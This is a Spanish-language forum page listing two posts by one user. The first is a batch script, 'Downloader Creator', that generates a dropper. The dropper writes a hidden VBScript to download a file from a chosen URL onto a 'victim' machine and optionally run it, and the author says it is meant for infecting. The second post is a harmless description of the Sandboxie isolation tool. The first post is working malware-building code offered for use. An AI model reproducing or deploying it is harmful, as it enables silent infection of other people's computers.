Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Stiuvert

#2621
Batch - Bash / Downloader + Launcher
Abril 25, 2011, 06:06:26 PM
Consiste básicamente en descargar un archivo ocultamente para luego ejecutarlo. Pensado mas que nada para infectar...



Código: php
echo off
color 1A
mode con cols=65lines=44
title Downloader Creator Full 0.1v
cls
echo.
echo ***********************************************
echo *****    Downloader Creator Full 0.1v     *****
echo *****         Por The Maxu                *****
echo ***********************************************
echo.
echo.
echo.
echo Primero selecione el nombre del bat a crear:
set /p name=
echo @echo off > C:\%name%.bat
echo.
echo Archivo Creado en C:\ con el nombre: %name%.bat
pause > nul
:main
cls
echo ***********************************************
echo *****    Downloader Creator Full 0.1v     *****
echo *****         Por The Maxu                *****
echo ***********************************************
echo.
echo 1. Descargar archivo en la victima
echo 2. Salir
echo.
set /p opc=Elije una:
if %opc%==1 goto down
if %opc%==2 exit
goto main

:down
cls
echo  Escriba la direcion de la descarga
set /p direciondescarga=
echo  Escriba la ruta en la que se guardara(ej: C:\imagen.png o C:\programa.exe)
set /p guardardescarga=
echo  Escriba un nombre para utilizar el vbs
set /p descarga=
echo echo Const adTypeBinary = 1 ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Const adSaveCreateOverWrite = 2 ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Dim BinaryStream ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Set BinaryStream = CreateObject("ADODB.Stream") ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Type = adTypeBinary ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Open ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Function BinaryGetURL(URL) ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Dim Http ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Http.Open "GET", URL, False ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Http.Send ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryGetURL = Http.ResponseBody ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo End Function ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo CScript //nologo c:\%descarga%.vbs "%direciondescarga%" "%guardardescarga%" >> C:\%name%.bat
echo Del c:\%descarga%.vbs >> C:\%name%.bat
goto ejecute
:ejecute
cls
echo desea que se ejecute despues de la descarga?
echo  1.si
echo  2.no
echo.
set /p siono=
if %siono%==1 goto ejecutar
if %siono%==2 goto main
:ejecutar
cls
echo start %guardardescarga% >> C:\%name%.bat
echo Ok, Virus editado.
pause > nul
goto main




Saludos
#2622

Sandboxie

Sandboxie es un software de tipo sandbox (textualmente bandeja de arena) para Microsoft Windows, parecido a un sistema de virtualización por «aislamiento». Este freeware  crea un «contenedor» dentro del cual los programas de aplicación se ejecutan de forma segura.




Los que descargamos y probamos muchas aplicaciones de Internet no siempre tenemos confianza en el desarrollador de la herramienta. Podemos cubrirnos las espaldas con Sandboxie (www.sandboxie.com), que crea un área aislada en la que las aplicaciones instaladas no tienen privilegios para realizar cambios que puedan dañar el sistema.

Además, todos los archivos creados en esa zona desaparecen al cerrar Sandboxie (Archivo/Salir). Su funcionamiento es sencillo. Pulsa sobre su icono en la barra de tareas y aparecerá la ventana de control Sandboxie con las aplicaciones que se están ejecutando de forma segura. Para ejecutar una aplicación en estas condiciones haz clic con el botón derecho sobre el archivo del programa en cuestión y selecciona Ejecutar SandBoxed. Con ello pasará a ejecutarse en la zona segura y aparecerá en la ventana de control.


¿ Cómo funciona Sandboxie ?

Sandboxie ejecuta sus programas en un espacio aislado, que les impide realizar cambios permanentes a otros programas y datos en su computadora.



Las flechas rojas indican los cambios que se derivan de un programa que se ejecuta en el ordenador. El cuadro con la etiqueta del disco duro (sin caja de arena) se muestra la evolución de un programa que se ejecuta con normalidad. El cuadro con la etiqueta del disco duro (con caja de arena) se muestra la evolución de un programa que se ejecuta bajo Sandboxie. La animación muestra que Sandboxie es capaz de interceptar los cambios y aislarlos dentro de un cajón de arena, representado como un rectángulo amarillo. También ilustra que la agrupación de los cambios en conjunto hace que sea fácil de borrar todos a la vez.

Fuente: PC-Actual